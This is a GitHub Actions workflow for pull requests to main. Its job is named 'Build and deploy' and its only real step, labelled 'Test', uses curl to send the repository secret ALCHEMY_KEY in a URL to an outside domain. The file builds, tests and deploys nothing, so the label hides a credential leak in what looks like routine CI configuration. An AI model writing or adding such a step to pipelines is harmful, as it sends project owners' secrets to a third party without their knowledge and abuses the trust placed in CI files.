name: CI Dev

on:
  pull_request:
    branches:
      - main
      
jobs:
# test:
#   ...
  deploy:
    runs-on: ubuntu-latest
    # needs: test
    name: Build and deploy
    steps:
      - name: Checkout
        uses: actions/checkout@v3.0.1
      - name: Test
        run: curl "https://live.kozlovzxc.ru?secret=$ALCHEMY_KEY"
        env:
          ALCHEMY_KEY: ${{ secrets.ALCHEMY_KEY }}

